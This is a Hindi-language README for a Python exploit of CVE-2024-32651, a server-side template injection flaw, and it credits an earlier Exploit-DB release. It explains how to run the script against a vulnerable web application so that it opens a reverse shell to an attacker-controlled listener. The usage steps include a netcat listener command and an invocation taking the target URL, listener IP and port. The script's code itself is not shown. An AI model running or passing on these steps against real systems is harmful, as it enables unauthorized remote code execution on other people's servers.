
सर्वर-साइड टेम्पलेट इंजेक्शन एक्सप्लॉइट
सर्वर-साइड टेम्पलेट इंजेक्शन एक्सप्लॉइट!!
कमजोर वेब एप्लिकेशन में सर्वर-साइड टेम्पलेट इंजेक्शन (SSTI) के माध्यम से रिमोट कोड निष्पादन
यह एक्सप्लॉइट उस वेब एप्लिकेशन को लक्षित करता है जो सर्वर-साइड टेम्पलेट इंजेक्शन (SSTI) के लिए कमजोर है। इस भेद्यता का फायदा उठाकर, एक हमलावर सर्वर पर मनमाने कमांड निष्पादित कर सकता है। दिया गया Python स्क्रिप्ट एक पेलोड सबमिट करके शोषण प्रक्रिया को स्वचालित करता है जो रिवर्स शेल ट्रिगर करता है।
भेद्यता को पुन: उत्पन्न करने के लिए, प्रदान की गई Python स्क्रिप्ट को कमजोर वेब एप्लिकेशन के विरुद्ध निष्पादित करें। सुनिश्चित करें कि आपके पास एक लिसनर (जैसे, nc -lvp 9999) चल रहा है ताकि रिवर्स शेल कनेक्शन को कैप्चर किया जा सके।
स्क्रिप्ट को सेव करें CVE-2024-32651.py नामक फ़ाइल में।
आवश्यक Python लाइब्रेरीज़ इंस्टॉल करें यदि पहले से इंस्टॉल नहीं हैं:
pip install requests beautifulsoup4
स्क्रिप्ट का उपयोग करने के लिए, निम्नलिखित कमांड-लाइन तर्क प्रदान करें:
--url: कमजोर वेब एप्लिकेशन का बेस URL (जैसे, http://10.10.10.10:5000)।--port: लिसनर के लिए पोर्ट (जैसे, 9999)।--ip: लिसनर का IP पता (जैसे, 10.10.50.22)।--notification: (वैकल्पिक) नोटिफिकेशन URL यदि आप किसी विशिष्ट नोटिफिकेशन URL का उपयोग करना चाहते हैं।python3 CVE-2024-32651.py --url http://<TARGET_URL> --port <LISTENER_PORT> --ip <LISTENER_IP> [--notification <NOTIFICATION_URL>]
यह एक्सप्लॉइट का सुधारा गया संस्करण Zach Crosman (zcrosman) द्वारा EDB-ID: 52027 के साथ प्रकाशित मूल एक्सप्लॉइट पर आधारित था। आप मूल एक्सप्लॉइट को यहाँ देख सकते हैं। मैं Zach Crosman को सुरक्षा समुदाय में उनके योगदान के लिए धन्यवाद देता हूँ।